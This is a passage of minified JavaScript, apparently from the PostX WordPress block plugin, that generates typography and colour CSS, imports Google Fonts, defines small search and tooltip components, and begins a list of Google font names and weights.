Object.keys(t).forEach(((o,s)=>{const p=t[o],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(o);if(!["rootCSS","presetTypoCSS"].includes(o)&&"object"==typeof p&&Object.keys(p).length){const e=!l.includes(p.family),t=n?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!r.includes(p.family.replace(" ","+")+":")&&void 0!==a.Z&&(r+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(a.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(i+=p.family?`--postx_preset_${o}_font_family: ${p.family}; `:"",i+=p.family?`--postx_preset_${o}_font_family_type: ${p.type||"sans-serif"}; `:"",i+=p.weight?`--postx_preset_${o}_font_weight: ${p.weight}; `:"",i+=p.style?`--postx_preset_${o}_font_style: ${p.style}; `:"",i+=p.decoration?`--postx_preset_${o}_text_decoration: ${p.decoration}; `:"",i+=p.transform?`--postx_preset_${o}_text_transform: ${p.transform}; `:"",i+=p.spacing?.lg?`--postx_preset_${o}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",i+=p.spacing?.sm?`--postx_preset_${o}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",i+=p.spacing?.xs?`--postx_preset_${o}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),i+=p.size?.lg?`--postx_preset_${o}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",i+=p.size?.sm?`--postx_preset_${o}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",i+=p.size?.xs?`--postx_preset_${o}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",i+=p.height?.lg?`--postx_preset_${o}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",i+=p.height?.sm?`--postx_preset_${o}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",i+=p.height?.xs?`--postx_preset_${o}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),i+="}",r+i}if("font_load"==e){let e="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=n?ultp_dashboard_pannel:ultp_data,o=!((!r.settings?.hasOwnProperty("disable_google_font")||"yes"==r.settings.disable_google_font)&&r.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const n=!a.includes(t.family);o&&n&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let a="";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],o=n?ultp_dashboard_pannel:ultp_data,i=!((!o.settings?.hasOwnProperty("disable_google_font")||"yes"==o.settings.disable_google_font)&&o.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,n)=>{const o=!r.includes(e);i&&o&&e&&(a+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[n]+"'); ")})),a}if("bgCSS"==e){let e={};const n="object"==typeof t?{...t}:{};if("color"==n.type)e.backgroundColor=n.color;else if("gradient"==n.type&&n.gradient){let t=n.gradient;"object"==typeof n.gradient&&(t="linear"==n.gradient.type?"linear-gradient("+n.gradient.direction+"deg, "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);":"radial-gradient( circle at "+n.gradient.radial+" , "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==n.type){var r;(n.fallbackColor||n.color)&&(e.backgroundColor=null!==(r=n.fallbackColor)&&void 0!==r?r:n.color),n.image&&(e.backgroundImage='url("'+n.image+'")',n.position&&(e.backgroundPositionX=100*n.position.x+"%",e.backgroundPositionY=100*n.position.y+"%"),n.attachment&&(e.backgroundAttachments=n.attachment),n.repeat&&(e.backgroundRepeat=n.repeat),n.size&&(e.backgroundSize=n.size))}else"video"==n.type&&n.fallback&&(e.backgroundImage='url("'+n.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var n;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(n=e.fallbackColor)&&void 0!==n?n:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n                font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},i=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},l=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},2402:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(4201);const r=({searchQuery:e,setSearchQuery:t,setTemplateModule:n,changeStates:r})=>(0,a.createElement)("div",{className:"ultp-design-search-wrapper"},(0,a.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),n&&n(""),r&&r("search",e.target.value)}}))},3100:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(2044);const r=(e,t,n,r)=>(0,a.Z)({url:e||null,utmKey:t||null,affiliate:n||null,hash:r||null})},4190:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2158);const r=e=>{let t;const[n,r]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:`ultp-tooltip-wrapper ${e.extraClass}`,onMouseEnter:()=>{t=setTimeout((()=>{r(!0)}),e.delay||400)},onMouseLeave:()=>{clearInterval(t),r(!1)}},e.children,n&&(0,a.createElement)("div",{className:`tooltip-content ${e.direction||"top"}`},e.content))}},2030:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa 